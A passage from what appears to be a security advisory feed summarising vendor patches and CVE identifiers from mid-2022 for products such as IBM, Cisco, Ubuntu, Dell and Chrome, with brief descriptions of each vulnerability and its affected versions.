and Chrome Beta 104 (104.0.5112.55) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Local File Inclusion (LFI) vulnerability has been discovered in the component
codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 that allows attackers
to execute arbitrary PHP code via a crafted HTTP request.
CVE ID: CVE-2022-32409 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
InDoorUnit (IDU) 3.4.66.162.
CVE ID: CVE-2022-28369 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
OutDoorUnit (ODU) 3.33.101.0.
CVE ID: CVE-2022-28375 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Verizon 5G Home LVSKIHP
InDoorUnit (IDU) 3.4.66.162.
CVE ID: CVE-2022-28373 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability via scripted action tools has been
discovered in Best Practical's RT for Incident Response (RTIR). The affected versions are
RTIR before 4.0.3 and 5.x before 5.0.3
CVE ID: CVE-2022-25801 (Critical)
Argo CD has released security updates to address an improper certificate validation
vulnerability, which can cause Argo CD to trust a malicious OpenID Connect (OIDC) provider.
The affected versions are Argo CD 0.4.0 and prior to 2.2.11, 2.3.6, and 2.4.5. Security
updates are available for Argo CD versions 2.4.5, 2.3.6, and 2.2.11.
CVE ID: CVE-2022-31105 (Critical)
Atlassian has released security updates to address Servlet Filter Dispatcher vulnerabilities
in its products.
CVE ID: CVE-2022-26136 (Critical), CVE-2022-26137 (Critical)
Atlassian has released security updates to address a vulnerability in Questions For
Confluence app for Confluence Server, and Confluence Data Center. The affected versions are
Questions for Confluence 2.7.34, 2.7.35, and Questions for Confluence 3.0.2.
CVE ID: CVE-2022-26138 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. Cisco will not release security updates to address the vulnerabilities in Cisco
Small Business RV110W, RV130, RV130W, and RV215W Routers as they have entered the
end-of-life process.
Drupal has released security updates to address multiple vulnerabilities in Drupal Core.
CVE ID: CVE-2022-25276, CVE-2022-25277 (Critical), CVE-2022-25278, CVE-2022-25275
Ubuntu has released security updates to address a vulnerability that incorrectly handled
signatures constructed from SSH public keys in PyJWT. A remote attacker could use this
vulnerability to forge a JWT signature. The affected versions are Ubuntu 22.04 LTS, Ubuntu
20.04 LTS and Ubuntu 18.04 LTS.
CVE ID: CVE-2022-29217 (High)
Oracle Solaris has released security updates to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Accusoft has released a security update to address a use-after-free vulnerability in
Accusoft ImageGear PSD Header. This vulnerability can lead to out-of-bounds heap writes,
which can cause memory corruption and code execution. The affected version is Accusoft
ImageGear 19.10.
CVE ID: CVE-2022-29465
Oracle has released its critical patch update for July 2022 to address 349 vulnerabilities
across multiple products. An attacker can exploit these vulnerabilities to take control of
an affected system.
Dahua has released security updates to address multiple vulnerabilities in Dahua's
Equipment- DHI-ASI7213X-T1 that can allow unauthorized access, upload malicious files, and
cause a Denial of Service (DoS) condition. The affected products are Dahua ASI7XXX versions
prior to v1.000.0000009.0.R.220620, Dahua IPC-HDBW2XXX versions prior to
v2.820.0000000.48.R.220614 and Dahua IPC-HX2XXX versions Prior to
v2.820.0000000.48.R.220614.
CVE ID: CVE-2022-30560 (High), CVE-2022-30561 (Medium), CVE-2022-30562 (Low),
CVE-2022-30563 (Medium)
WordPress has released security updates to resolve a Stored Cross-Site Scripting
vulnerability via the ‘templates[browsingpage]‘ parameter in the WP-UserOnline plugin. The
affected versions are WP-UserOnline versions up to, and including 2.87.6.
CVE ID: CVE-2022-2473 (Medium)
Dell has released security updates to address several vulnerabilities in Dell products. The
affected products are Dell Connectrix (Brocade), Dell SmartFabric Storage Software, Dell
Connectrix (Cisco) DCNM and NDFC, and Dell Connectrix (Cisco) MDS DCNM.
Google Chrome has released Stable channel 103.0.5060.132 (Platform version: 14816.131.0) for
most ChromeOS devices and Stable channel 103.0.5060.134 for Windows, Mac and Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-2477 (High), CVE-2022-2478 (High), CVE-2022-2479 (High),
CVE-2022-2480 (High), CVE-2022-2481 (High), CVE-2022-2163 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Digiwin BPM’s function has insufficient validation for user
input. An unauthenticated remote attacker can inject arbitrary SQL commands to access,
modify, delete database, or disrupt services.
CVE ID: CVE-2022-32456 (Critical)
A vulnerability has been discovered in the PeopleSoft Enterprise PeopleTools product of
Oracle PeopleSoft. Successful exploitation can result in takeover of PeopleSoft Enterprise.
The affected versions are PeopleSoft Enterprise PeopleTools 8.58 and 8.59.
CVE ID: CVE-2022-21543 (Critical)
A vulnerability has been discovered in Itech Auction Script that can initiate the attack
remotely. The affected version is Itech Auction Script 6.49.
CVE ID: CVE-2017-20138 (Critical)
A SQL injection vulnerability has been discovered in seminars (aka Seminar Manager)
extension through 4.1.3 for TYPO3.
CVE ID: CVE-2022-29601 (Critical)
A SQL injection vulnerability has been discovered in oelib (aka One is Enough Library)
extension through 4.1.5 for TYPO3.
CVE ID: CVE-2022-29600 (Critical)
A permission assignment vulnerability has been discovered in Application Security module of
HarmonyOS that can affect data integrity and confidentiality.
CVE ID: CVE-2022-34737 (Critical)
A misconfigured file permission vulnerability has been discovered in netaddr gem before
version 2.0.4 which can result in 0777 permissions in the target filesystem.
CVE ID: CVE-2019-17383 (Critical)
Multiple vulnerabilities have been discovered in MiCODUS' Equipment- MV720 GPS tracker.
Successful exploitation can allow an attacker control over any MV720 GPS tracker, granting
access to location, routes, fuel cutoff commands, and the disarming of various features
(e.g., alarms).
CVE ID: CVE-2022-2107 (Critical), CVE-2022-2141 (Critical), CVE-2022-2199 (High),
CVE-2022-34150 (High), CVE-2022-33944 (Medium)
Mitsubishi Electric has released security updates to address multiple vulnerabilities in its
Equipment- GENESIS64 and MC Works64 which can cause information disclosure, Denial of
Service (DoS) condition or Remote Code Execution (RCE).
CVE ID: CVE-2022-29834 (High), CVE-2022-33315 (High), CVE-2022-33316 (High),
CVE-2022-33317 (High), CVE-2022-33318 (Critical), CVE-2022-33319 (High), CVE-2022-33320
(High)
Zyxel has released security updates to address privilege escalation, and authenticated
directory traversal vulnerabilities in its products.
CVE ID: CVE-2022-30526, CVE-2022-2030
Veritas has released security updates to address multiple vulnerabilities in NetBackup
OpsCenter. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-36954 (Critical), CVE-2022-36951 (Critical), CVE-2022-36950
(Critical), CVE-2022-23457 (Critical), CVE-2022-36949 (Critical), CVE-2022-36952 (High),
CVE-2022-36948 (Medium), CVE-2022-36953 (Medium)
Grails has released security updates to address a Remote Code Execution (RCE) vulnerability
in Grails framework. This vulnerability allows an attacker to remotely execute code within a
Grails application runtime by issuing a specially crafted web request that grants the
attacker access to the class loader.
CVE ID:CVE-2022-35912 (Critical)
A Remote Code Execution (RCE) vulnerability via the function parserIfLabel at function.php
has been discovered in PbootCMS. The affected version is PbootCMS v3.1.2.
CVE ID: CVE-2022-32417 (Critical)
It has been discovered that Apache CloudStack has a SAML 2.0 authentication Service Provider
plugin which is vulnerable to XML external entity (XXE) injection. The affected versions are
Apache CloudStack version 4.5.0 and later.
CVE ID: CVE-2022-35741 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to resolve multiple vulnerabilities in WebKitGTK Web &
JavaScript engines that can cause Cross Site Scripting (XSS) attacks, Denial of Service
(DoS) attacks, and arbitrary code execution. The affected products are Ubuntu 22.04 LTS &
Ubuntu 20.04 LTS.
CVE ID: CVE-2022-26710, CVE-2022-22677
Ubuntu has released security updates to address a vulnerability in libhttp-daemon-perl
package that can cause HTTP Request smuggling attack. The affected products are Ubuntu 16.04
ESM & Ubuntu 14.04 ESM.
CVE ID: CVE-2022-31081 (Medium)
WordPress has released security updates to resolve a deserialization of an untrusted input
vulnerability via the ‘fts_url’ parameter in Feed Them Social – for Twitter feed, Youtube
and more plugin. The affected versions are Feed Them Social – for Twitter feed, Youtube &
more versions up to, and including 2.9.8.5.
CVE ID: CVE-2022-2437 (High)
Dell has released security updates to address several vulnerabilities in multiple
third-Party components. The affected products are various versions of Dell Avamar Server
Hardware Appliance Gen4S and Gen4T, Dell Avamar Virtual Edition, Dell Avamar NDMP
Accelerator, Dell Avamar VMware Image Proxy, Dell NetWorker Virtual Edition (NVE) , Dell
PowerProtect DP Series Appliance and Dell Integrated Data Protection Appliance (IDPA).
Google has released LTC (Long Term Support Candidate) channel 102.0.5005.153 (Platform
Version: 14695.114.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2156 (Critical), CVE-2022-2294 (High), CVE-2021-30560 (Medium),
CVE-2022-29824 (Medium)
Multiple critical vulnerabilities in the CODESYS V3 runtime affect Festo controller CECC
products. An attacker can exploit these vulnerabilities to take control of an affected
system. Security updates are available for some products.
CVE ID: CVE-2021-33485 (Critical), CVE-2020-10245 (Critical), CVE-2019-13548
(Critical), CVE-2019-18858 (Critical), CVE-2018-10612 (Critical), CVE-2021-33485 (Critical),
CVE-2019-9010 (Critical)
SonicWall has released security updates to address a Remote Code Execution (RCE)
vulnerability in SonicWall Switch and an improperly implemented security check vulnerability
in the SonicWall Hosted Email Security. The affected products are SonicWall Switch version
1.1.1.0-2s and earlier and SonicWall Hosted Email Security 10.0.17.7319 and earlier
versions.
CVE ID: CVE-2022-2323 (High), CVE-2022-2324 (High)
It has been discovered that Zimbra Collaboration Open Source does not encrypt the
initial-login randomly created password that is visible in cleartext on port UDP 514 (aka
the syslog port). The affected version is Zimbra Collaboration Open Source 8.8.15.
CVE ID: CVE-2022-32294 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2021-33473 (Critical), CVE-2021-37404 (Critical), CVE-2022-1678 (High),
CVE-2022-1882 (High), CVE-2022-2097 (Low), CVE-2022-2274 (High), CVE-2022-29824 (Medium),
CVE-2022-29968 (High), CVE-2022-32250 (High), CVE-2022-32275 (High), CVE-2022-24735 (High),
CVE-2022-24736 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
ABB has released security updates to address a path traversal vulnerability in the
implementation of the Totalflow TCP protocol in ABB G5 products. Successful exploitation of
this vulnerability can lead to root access.
CVE ID: CVE-2022-0902 (High)
Multiple out of bounds read vulnerabilities have been discovered in Open Design Alliance's
equipment- Drawings SDK. Successful exploitation can allow a user to open a malicious DWG
file that can lead to the application crashing or to arbitrary code execution.
CVE ID: CVE-2022-28807 (High), CVE-2022-28808 (High), CVE-2022-28809 (High)
Dell has released security update to address Cross-Site Request Forgery (CSRF) & Java
StackOverflow vulnerabilities in Dell Data Protection Central that can lead to processing of
unintended server operations. The affected products are Dell Data Protection Central
Security versions 19.1, 19.2, 19.3, 19.4, 19.5, and 19.6.
CVE ID: CVE-2022-34367 (Medium), CVE-2020-36518 (High)
Google Chrome has released Dev channel 105.0.5176.3 for Windows, Mac and Linux, Chrome Beta
104 (104.0.5112.48) for iOS, and Chrome Dev 105 (105.0.5176.0) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel
that can cause a Denial of Service (DoS) or execute arbitrary code.
CVE ID: CVE-2022-1975, CVE-2022-1974, CVE-2022-1734 (High), CVE-2022-0500 (High),
CVE-2022-33981 (Low), CVE-2022-1789 (Medium)
Hertzbleed vulnerability in AMD processors is affecting multiple F5 products that may allow
an authenticated attacker to execute a timing attack to potentially enable information
disclosure.
CVE ID: CVE-2022-23823 (Medium)
Hertzbleed vulnerability in Intel(R) processors is affecting multiple F5 products that may
allow an authenticated attacker to potentially enable information disclosure via network
access.
CVE ID: CVE-2022-24436 (Medium)
Juniper Networks has released security updates to address multiple vulnerabilities affecting
its products. An attacker can exploit some of these vulnerabilities to take control of an
affected system.
It has been discovered that Netwrix Auditor is vulnerable to an insecure object
deserialization issue that is caused by an unsecured .NET remoting service. Successful
exploitation can cause Remote Code Execution (RCE) on Netwrix Auditor servers. The affected
versions are all supported versions of Netwrix Auditor prior to 10.5.
Drupal has released security update to address Remote Code Execution, and Information
disclosure vulnerabilities in dompdf/dompdf third-party dependency that affects the Entity
Print module. The affected versions are dompdf/dompdf versions below 2.0.0.
Cisco released a security update to address an authentication bypass vulnerability in Cisco
Identity Services Engine (ISE). Successful exploitation can allow an unauthenticated, remote
attacker to log in without credentials and access all roles without any restrictions.
CVE ID: CVE-2022-20733 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2022-1183 (High), CVE-2022-1734 (High), CVE-2022-1998 (High),
CVE-2022-2068 (Medium), CVE-2022-23712 (High), CVE-2018-10237 (Medium), CVE-2022-22970
(High), CVE-2022-27778 (High), CVE-2022-27779 (Medium), CVE-2022-27780 (Medium),
CVE-2022-27781 (Medium), CVE-2022-27782 (Medium), CVE-2022-30115 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-46141, CVE-2021-46142, CVE-2022-2319, CVE-2022-2320, CVE-2022-34903
Citrix has released security updates to resolve vulnerabilities that affect Citrix
Hypervisor, when running on AMD Zen 1 or AMD Zen 2 CPUs.
CVE ID: CVE-2022-23825, CVE-2022-29900
Microsoft released security updates to address an elevation of privilege vulnerability in
Windows Client Server Runtime Subsystem (CSRSS) affecting multiple window products that can
cause a gain in system privileges.
CVE ID: CVE-2022-22047 (High)
Multiple vulnerabilities such as information disclosure and arbitrary speculative code
execution have been discovered in several AMD Processor used in Desktop, Mobile, Graphics,
Chromebook and Server. Mitigations are available.
CVE ID: CVE-2022-29900 (RETbleed) (aka CVE-2022-23816), CVE-2022-23825
Windows 8.1 will reach end of support on January 10, 2023, at which point technical
assistance and software updates will no longer be provided. The affected editions are
Windows 8.1-Enterprise, Enterprise N, N, Pro with Media Center, Professional, Professional N
and SL.
A reflected DOM-Based XSS vulnerability has been discovered in the Help directory of Veeam
Management Pack for Microsoft System Center 8.0. Successful exploitation of this
vulnerability can allow for the execution of arbitrary scripts. Veeam Management Pack for
Microsoft System Center 8.0 has reached End-of-Fix, and all users are recommended to upgrade
to the latest version of Veeam Management Pack for Microsoft System Center.
CVE ID: CVE-2022-32225
Siemens has released security updates and mitigations to resolve multiple vulnerabilities in
its products.
CVE ID: CVE-2022-31619 (Critical), CVE-2022-26649 (Critical), CVE-2022-33736
(Critical), CVE-2021-29998 (Critical), CVE-2021-40358 (Critical), CVE-2021-44222 (Critical),
CVE-2022-34819 (Critical)
Hitachi Energy has released security updates to address multiple vulnerabilities in Hitachi
Energy's Equipment- MSM. Successful exploitation can cause an attacker to gain access to
sensitive information or to cause a Denial of Service (DoS), or trick the user into
downloading malicious software. The affected products are MSM version 2.2 and earlier.
CVE ID: CVE-2018-16842 (Critical), CVE-2016-8618 (Critical), CVE-2016-8619
(Critical), CVE-2016-7167 (Critical)
Microsoft released security updates to mitigate multiple vulnerabilities in Azure Site
Recovery (ASR). These vulnerabilities affect all ASR on-premises customers using a
VMware/Physical to Azure scenario and are fixed in the latest ASR 9.49 release.
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Microsoft has released security updates to address multiple vulnerabilities in its software.
An attacker can exploit these vulnerabilities to take control of an affected system.
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Dahua's Equipment- DHI-ASI7213X-T1, a
facial recognition access controller. Successful exploitation of these vulnerabilities can
allow unauthorized access, upload malicious files and cause a Denial of Service (DoS)
condition. The affected product is Dahua ASI7213X-T1: Firmware v1.000.10Be006.0.R.201213.
CVE ID: CVE-2022-2334 (High), CVE-2022-2335 (Medium), CVE-2022-2336 (High),
CVE-2022-2337 (High), CVE-2022-2338 (High)
Intel has released security updates to address multiple information disclosure
vulnerabilities in its products. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2022-28693 (Medium), CVE-2022-29901 (Medium)
HP has released security updates to resolve multiple information disclosure vulnerabilities
(known as RETbleed) discovered in some Intel Processors and AMD Processors. The affected
products are HP Wolf for Business, HP Wolf Pro Security, HP Sure Click Enterprise and HP
Sure Access Enterprise.
CVE ID: CVE-2022-23816 (Medium), CVE-2022-23824 (Medium), CVE-2022-23825 (Medium),
CVE-2022-28693 (Medium), CVE-2022-29901 (Medium)
HP has released updated versions of Tera2 Zero Client Firmware that remediate a
vulnerability discovered in firmware version 22.04 and earlier.
CVE ID: CVE-2022-1805 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Lenovo has released security updates to address multiple vulnerabilities in its products and
has also provided information & mitigation about vulnerabilities in Intel and AMD processors
affecting Lenovo products.
CVE ID: CVE-2022-34884, CVE-2022-34888, CVE-2022-1890, CVE-2022-1891, CVE-2022-1892,
CVE-2022-29901, CVE-2022-28693, CVE-2022-29900, CVE-2022-23825
Dell has released security updates to resolve an improper access control vulnerability in
the Identity and Access Management (IAM) module of Dell ECS that allows read access to
unauthorized data.
CVE ID: CVE-2022-31231 (Medium)
Lenze SE has released a security update to resolve a vulnerability that causes skip the
password verification upon second login in multiple cabinet series products. Successful
exploitation can allow full access to the device without knowledge of the password.
CVE ID: CVE-2022-2302 (Critical)
It has been discovered that Python LDAP incorrectly handled certain regular expressions
which can cause Denial of Service (DoS). Security updates are available. The affected
products are Ubuntu 22.04, Ubuntu 21.10, Ubuntu 20.04 and Ubuntu 18.04. CVE ID: CVE-2021-46823 (Medium)
It has been discovered that Dovecot incorrectly handled multiple passdb configuration
entries which can cause privilege escalation vulnerability. Security updates are available.
The affected products are Ubuntu 22.04, Ubuntu 21.10, Ubuntu 20.04 and Ubuntu 18.04. CVE ID: CVE-2022-30550
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
A Cross-Site Scripting (XSS) vulnerability in Apache Tomcat affects F5 product's Traffix
SDC. Successful exploitation can compromise the confidentiality and integrity of data on the
affected system. The affected versions are Traffix SDC 5.2.0 and 5.1.0. CVE ID: CVE-2022-34305 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released a security update to address memory access vulnerabilities in Vim
package that can cause corruption of sensitive information, a crash, arbitrary code
execution, or use unexpected values. CVE ID: CVE-2022-1968 (High), CVE-2022-1897 (High), CVE-2022-1942 (High)
Multiple vulnerabilities have been discovered in Bently Nevada equipment's 3701/4X series,
all versions and 60M100 (3701/60), all versions Condition Monitoring System (CMS) that can
allow file manipulation, Remote Code Execution (RCE), or cause a Denial-of-Service (DoS)
condition. Security updates are available for Bently Nevada 701/4X series. Bently Nevada
60M100 (3701/60) is approaching end-of-life status, only mitigation is available. CVE ID: CVE-2022-29953 (Critical), CVE-2022-29952 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2022-1183 (High), CVE-2022-1734 (High), CVE-2022-1998 (High),
CVE-2022-2068 (Medium), CVE-2022-23712 (High), CVE-2022-28660 (Critical), CVE-2022-29170
(High), CVE-2022-30594 (High), CVE-2022-22976 (Medium), CVE-2022-22978 (Critical),
CVE-2022-31621 (Medium), CVE-2022-31622 (Medium), CVE-2022-31623 (Medium), CVE-2022-31624
(Medium)
An improper restriction of rendered UI layers or frames vulnerability has been discovered in
Rockwell Automation's Equipment- MicroLogix 1100/1400 that can lead to a loss of sensitive
information, such as authentication credentials.
CVE ID: CVE-2022-2179 (Medium)
Dell has released security updates to address multiple vulnerabilities in Dell PowerStore
Family that can be exploited by malicious users to compromise the affected system.
Google has released Beta channel 104.0.5112.36 (Platform version: 14909.52.0) for most
ChromeOS devices, Beta channel 104.0.5112.39 for Windows, Mac and Linux, and Chrome Beta 104
(104.0.5112.37) for Android.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Mitsubishi Electric has released security updates to resolve a Denial of Service (DoS)
vulnerability due to uncontrolled resource consumption in Mitsubishi Electric's Equipment-
MELSEC iQ-R Series C Controller Module.
CVE ID: CVE-2021-20600
Microsoft has released Microsoft Edge Stable Channel (Version 103.0.1264.49), which
incorporates the latest security updates of the Chromium project. Security updates resolve
heap buffer overflow vulnerability in WebRTC and type Confusion vulnerability in V8. CVE ID: CVE-2022-2294, CVE-2022-2295
Android has released security bulletin to resolve multiple vulnerabilities affecting several
Android devices. Security patch levels of 2022-06-05 or later, address all of these issues.
Festo has released security updates to address multiple preauthentication command injection
vulnerabilities in Festo controller CECC-X-M1 product family. Any person who is able to gain
access to the webserver can run arbitrary system commands on the device with root
privileges. CVE ID: CVE-2022-30308 (Critical), CVE-2022-30309 (Critical), CVE-2022-30310
(Critical), CVE-2022-30311 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20812 (Critical), CVE-2022-20813 (Critical), CVE-2022-20808 (High),
CVE-2022-20752 (Medium), CVE-2022-20862 (Medium), CVE-2022-20859 (Medium), CVE-2022-20768
(Medium), CVE-2022-20815 (Medium), CVE-2022-20800 (Medium), CVE-2022-20791 (Medium)
Maui ransomware is being used to target Healthcare and Public Health (HPH) Sector
organisations. Maui ransomware (maui.exe) is an encryption binary. aui uses a combination of
Advanced Encryption Standard (AES), RSA, and XOR encryption to encrypt target files.
Dell has released security update to address a Remote Code Execution (RCE) vulnerability in
Cloud Mobility for Dell EMC Storage version 1.3.0 and prior. Any basic user may purposefully
or accidently exploit this vulnerability, leading to RCE with full take over of the system.
CVE ID: CVE-2022-33936 (High)
SUSE has released security update to resolve a Denial of Service (DoS) vulnerability via
set-cookie2 header vulnerability in haproxy. CVE ID: CVE-2022-0711 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
HarmonyOS has released security bulletin to address multiple vulnerabilities affecting
several Huawei phones and tablets that run HarmonyOS. Security patch levels of 2022-07-01 or
later address all of these issues.
A vulnerability exists in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA
instructions. Affected version is OpenSSL 3.0.4. It is recommended to upgrade to OpenSSL
3.0.5. CVE ID: CVE-2022-2274 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in various WordPress plugins. Security update
is available for Visualizer WordPress plugin. No patches are available for AnyMind Widget
and FreeMind WP Browser WordPress plugins. CVE ID: CVE-2022-2251 (High), CVE-2022-2252 (High), CVE-2022-2256 (High)
Dell has released security update to address a privilege escalation vulnerability in Dell
PowerProtect Cyber Recovery versions before 19.11. CVE ID: CVE-2022-32481 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address multiple vulnerabilities in PHP & Django. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-31625 (Critical), CVE-2022-31626 (High), CVE-2022-34265 (High)
Django has released security updates to address a SQL injection vulnerability in Django's
main branch, versions 4.1, 4.0, and 3.2. CVE ID: CVE-2022-34265 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released updated Chrome 103 (103.0.5060.71) for Android, Stable channel
103.0.5060.114 for Windows, and Extended Stable channel 102.0.5005.148 for Windows and Mac.
An exploit for heap buffer overflow vulnerability (CVE-2022-2294) exists in the wild. CVE ID: CVE-2022-2294 (High), CVE-2022-2295 (High), CVE-2022-2296 (High)
SUSE has released security updates to resolve multiple vulnerabilities in Linux Kernel.
CVE ID: CVE-2022-1116 (High), CVE-2022-1734 (High), CVE-2022-1966, CVE-2022-1972,
CVE-2022-32250 (High)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. The Debian Long Term Support (LTS) team also announced that Debian 9 stretch support
has reached its end-of-life on July 1, 2022. Debian will not provide further security
updates for Debian 9.
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel &
curl package. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-28388 (High), CVE-2022-21125 (Medium), CVE-2022-21123 (Medium),
CVE-2022-21166 (Medium), CVE-2022-1652 (High), CVE-2022-1353 (High), CVE-2022-28356 (High),
CVE-2022-1734 (High), CVE-2021-4202 (High), CVE-2022-1419 (High), CVE-2021-4197 (High),
CVE-2022-1679 (High), CVE-2022-27781 (High), CVE-2022-32208.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that NVFLARE contains a vulnerability in its PKI implementation
module, that can cause Remote Code Execution (RCE), Denial Of Service (DoS), and impact both
confidentiality and integrity. The affected products are NVFLARE, versions prior to 2.1.2.
CVE ID: CVE-2022-31604 (Critical)
It has been discovered that NVFLARE contains a vulnerability in its utils module, that can
cause Remote Code Execution (RCE), Denial Of Service (DoS), and impact both confidentiality
and integrity. The affected products are NVFLARE, versions prior to 2.1.2. CVE ID: CVE-2022-31605 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in the curl package
that allow to perform a machine-in-the-middle attack and Denial of Service (DoS) attack.
CVE ID: CVE-2022-32208, CVE-2022-27781 (High)
Multiple vulnerabilities have been discovered in various WordPress plugins. Security updates
are available for WP All Import and Download Manager WordPress plugins. No patch is
available for Image Slider and Gallery for Social Photo WordPress plugins. CVE ID: CVE-2022-1565 (Medium), CVE-2022-2223 (Medium), CVE-2022-2224 (Medium),
CVE-2022-2101 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system.
Multiple Operational Technology (OT):ICEFALL vulnerabilities have been discovered in
Emerson's Equipment- DeltaV Distributed Control System. Successful exploitation of these
vulnerabilities can result in a Denial-of-Service (DoS) condition, manipulation of runtime
communications, or compromise of a controller. CVE ID: CVE-2022-29957 (Medium), CVE-2022-29962 (Medium), CVE-2022-29963 (Low),
CVE-2022-29964 (Medium), CVE-2022-29965 (High), CVE-2022-30260 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in CODESYS V3
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-30791 (Medium), CVE-2022-30792 (Medium), CVE-2022-22519
(High),CVE-2022-22513 (High), CVE-2022-22514 (High), CVE-2022-22518 (Medium), CVE-2022-22517
(High), CVE-2022-22515 (High)
Google has released updated Dev channel 105.0.5148.2 for Windows, Mac and Linux, Chrome Beta
104 (104.0.5112.29) for iOS, and Chrome Dev 105 (105.0.5149.0) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An improper authentication vulnerability has been discovered in Exemys' Equipment- RME1 that
can allow an attacker with network access to bypass authentication and perform
administrative operations. It is recommended to update to a new supported product RME2 as
RME1 is considered to be an end-of-life product. CVE ID: CVE-2022-2197 (Critical)
Cross-Site Scripting (XSS) and OS command injection vulnerabilities have been discovered in
Distributed Data Systems' Equipment- WebHMI, which can allow a user with administrative
privileges in WebHMI to execute arbitrary OS commands or impact other logged-in users. The
affected products are WebHMI 4.1.1.7662 and possibly prior versions. CVE ID: CVE-2022-2254 (Medium), CVE-2022-2253 (Critical)
GitLab has released updated versions 15.1.1, 15.0.4, and 14.10.5 for GitLab Community
Edition (CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities. CVE ID: CVE-2022-2185 (Critical), CVE-2022-2235 (High), CVE-2022-2230 (High),
CVE-2022-2229 (High)
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1116 (High), CVE-2018-10237 (Medium)
McAfee has released a security update to address a privilege escalation vulnerability in
Data Exchange Layer (DXL) Broker for Windows prior to 6.0.0.280. CVE ID: CVE-2022-2188 (Medium)
Jira has released security updates to address a vulnerability that allows a remote,
authenticated user to perform a full-read Server Side Request Forgery (SSRF) in Mobile
Plugin for Jira Data Center and Server. CVE ID: CVE-2022-26135 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to address a vulnerability that allows to log password
hashes when reporting schema failures in its cloud-init package. An attacker with access to
these logs can use this to gain user credentials. CVE ID: CVE-2022-2084
Mozilla has released a security update to address a vulnerability in Firefox for iOS. An
attacker can exploit this vulnerability to take control of an affected system. CVE ID: CVE-2022-31746 (Medium)
Google has released Chrome Beta 104 (104.0.5112.29) & Chrome 103 (103.0.5060.70) for
Android, Dev channel 105.0.5140.0 (Platform version: 14943.0.0) & Beta channel 104.0.5112.23
(Platform version: 14909.26.0) for most ChromeOS devices and Beta channel 104.0.5112.29 for
Windows, Mac and Linux.
